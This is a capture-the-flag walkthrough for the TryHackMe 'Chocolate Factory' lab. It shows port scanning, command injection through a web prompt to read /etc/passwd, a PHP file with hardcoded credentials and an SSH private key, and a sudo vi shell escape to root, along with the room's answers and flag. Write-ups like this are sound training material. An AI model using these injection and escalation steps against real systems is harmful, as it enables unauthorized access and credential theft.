TryHackMe | Chocolate Factory
This is one (of many) walkthrough for the Chocolate Factory CTF room. As always, I try to follow some simple enumeration steps to expose potential flaws from this article.
Enumeration
As usual, I use nmap to see which ports are open.
$ nmap $IP-ADDRESS
Starting Nmap 7.60 ( https://nmap.org ) at 2023-02-24 16:04 GMT
Nmap scan report for ip-10-10-44-122.eu-west-1.compute.internal (10.10.44.122)
Host is up (0.0014s latency).
Not shown: 989 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
100/tcp open newacct
106/tcp open pop3pw
109/tcp open pop2
110/tcp open pop3
111/tcp open rpcbind
113/tcp open ident
119/tcp open nntp
125/tcp open locus-map
MAC Address: 02:59:04:96:EF:5D (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 1.60 secondsFrom this command, there are several open ports. We can see that port 80 is open for the web-server. Based on my resolution steps, I tried to access the webserver through ftp as an Anonymous user.
$ ftp $IP-ADDRESS
Connected to $IP-ADDRESS.
220 (vsFTPd 3.0.3)
Name (10.10.44.122:root): Anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-rw-r-- 1 1000 1000 208838 Sep 30 2020 gum_room.jpg
226 Directory send OK.
ftp>I was able to gather an image file from the ftp server. Let’s find out later if it has something valuable to exploit later. Furthermore, we can execute dirbuster to brute-force some hidden folders and files from the web-server.
gobuster dir -u http://$IP-ADDRESS -x html,txt,php,js -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://$IP-ADDRESS
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: html,txt,php,js
[+] Timeout: 10s
===============================================================
2023/02/24 16:08:43 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
...
/home.php (Status: 200)
/index.html (Status: 200)
/index.html (Status: 200)
/server-status (Status: 403)
===============================================================
2023/02/24 16:08:46 Finished
===============================================================The index.html didn’t have anything useful. However home.php page sounded pretty interesting as it rendered a command line prompt. By running simple commands such as ls, pwd we could enumerate several files under the web server folder.
# run ls
ls
# the webpage returned those results
home.jpg home.php image.png index.html index.php.bak key_rev_key validate.php After running the ls command, I quickly noticed a key_rev_key that could mean something. I did seem that cat was not a blacklist command at all as I could see the contents of a potential executable.
Doing a quick strings command on it, there was something that caught my eye.
# FROM THM VM
$ strings key_rev_key
...
Enter your name:
laksdhfas
congratulations you have found the key:
b'-VkgXhFf6sAEcAwrC6YR-SZbiuSb8ABXeQuvhcGSQzY='
Keep its safe
Bad name!
...
That seemed the contents of a key that we were supposed to found, as it solved the first question.
Furthermore, investigating other pages that were not found using gobuster we could see that the index.php.bak was simply a backup file for the home page. Nothing to add here. However, the contents of the validate.php file were a bit more complicated to fetch as it returned all the time “invalid credentials”, redirecting us to the index page. At this moment, I was just hoping to make a curl to the command line prompt POST request and retrieve the content of the validate page. After checking the network request from the developer tools from Firefox, I quickly found the request made.
# FROM THE THM VM
$ curl -X POST http://IP-ADDRESS/home.php -d "command=cat+validate.php"
....OTHER-HTML-CONTENT
<?php
$uname=$_POST['uname'];
$password=$_POST['password'];
if($uname=="charlie" && $password=="cn7824"){
echo "<script>window.location='home.php'</script>";
}
else{
echo "<script>alert('Incorrect Credentials');</script>";
echo "<script>window.location='index.html'</script>";
}
?></body>
</html>From the output, the answer to the second question was just in front of my eyes.
At this point, I didn’t have any information at my disposal, except the command line prompt and a potential password.
Let’s see if we can list other directories and hidden files. For the sake of simplicity, the following commands output were rendered on the home page.
# where am at?
$ pwd
/var/www/html
# list other directories
$ ls /home
charlie
# print the /etc/passwd file (/etc/shadow was not possible to print)
$ cat /etc/passwd
...
root:x:0:0:root:/root:/bin/bash
charlie:x:1000:1000:localhost:/home/charley:/bin/bash
...
# print the charlie directory
$ ls /home/charlie
teleport teleport.pub user.txt
# can we print the user flag?
$ cat /home/charlie/user.txt
--empty-output--
# can we print the teleport and teleport.pub?
$ cat /home/charlie/teleport
-----BEGIN RSA PRIVATE KEY-----
....
-----END RSA PRIVATE KEY-----From all the attempts to retrieve intel about potential ways to access the server, it seemed that the charlie’s private key could be our way in. However, I wanted to try something before. By inserting the potential charlie credentials in the home sign in page, nothing really stunning happened. I was just redirected to the home page. Even with the correct credentials, I could not retrieve the contents of the first flag.
Back to the private key. The output of the command line prompt was not good enough for John the Ripper to transform it into a valid hash to be cracked. I managed to remove some tabs and fix the structure of the key. If it took you a while to manage it to work, don’t worry. It took me several minutes to being accepted by John as well.
# FROM THE THM VM
$ /opt/john/ssh2john teleport
teleport has no password!Wait. What? No password? This is too good to be true. If I attempt to enter the server through ssh, I’ll have a red carpet waiting for me? 😙
# give the right permissions
$ chmod 600 teleport
$ ssh -i teleport charlie@IP-ADDRESS
...
charlie@chocolate-factory:/$ whoami
charlieWell, it blends! I am in as charlie. The user flag is just around the corner. Go grab it!
Privilege Escalation
The remaining of the CTF introduced some new challenges. The very first thing to do was to list the commands I was allowed to execute on behalf of charlie.
charlie@chocolate-factory:/$ sudo -l
Matching Defaults entries for charlie on chocolate-factory:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User charlie may run the following commands on chocolate-factory:
(ALL : !root) NOPASSWD: /usr/bin/vi
charlie@chocolate-factory:/$From the output, I could run vi as sudo without having to insert the password. Same old, same old. From Gtfo, I followed the steps to escalate my privileges.
$ sudo vi -c ':!/bin/sh' /dev/null
$ whoami
root
# access root folder
$ cd /root
$ ls /root
root.pyThis one seemed different than other CTF I tried. A python file that is asking for a key. Could it be the key I used to answer the first question will allow me to finish the CTF? Let’s find out
# FROM THE SSH SESSION
$ python root.py
Enter the key: b'-VkgXhFf6sAEcAwrC6YR-SZbiuSb8ABXeQuvhcGSQzY='
\ \ / /__ _ _ / \ _ __ ___ | \ | | _____ __ |_ _| |__ ___
\ V / _ \| | | | / _ \ | '__/ _ \ | \| |/ _ \ \ /\ / / | | | '_ \ / _ \
| | (_) | |_| | / ___ \| | | __/ | |\ | (_) \ V V / | | | | | | __/
|_|\___/ \__,_| /_/ \_\_| \___| |_| \_|\___/ \_/\_/ |_| |_| |_|\___|
___ ___ __
/ _ \__ ___ __ ___ _ __ / _ \ / _|
| | | \ \ /\ / / '_ \ / _ \ '__| | | | | |_
| |_| |\ V V /| | | | __/ | | |_| | _|
\___/ \_/\_/ |_| |_|\___|_| \___/|_|
____ _ _ _
/ ___| |__ ___ ___ ___ | | __ _| |_ ___
| | | '_ \ / _ \ / __/ _ \| |/ _` | __/ _ \
| |___| | | | (_) | (_| (_) | | (_| | || __/
\____|_| |_|\___/ \___\___/|_|\__,_|\__\___|
_____ _
| ___|_ _ ___| |_ ___ _ __ _ _
| |_ / _` |/ __| __/ _ \| '__| | | |
| _| (_| | (__| || (_) | | | |_| |
|_| \__,_|\___|\__\___/|_| \__, |
|___/
flag{cec59161d338fef787fcb4e296b42124}You are now the owner of the chocolate factory!
Conclusion
Even though I am not super familiar with the chocolate factory movies, I found this CTF really interesting. Some of the answers to the exercise were not so obvious and this final challenge was kinda unexpected. Kudos to 0x9747, saharshtapi and AndyInfoSec for creating this one! 👍
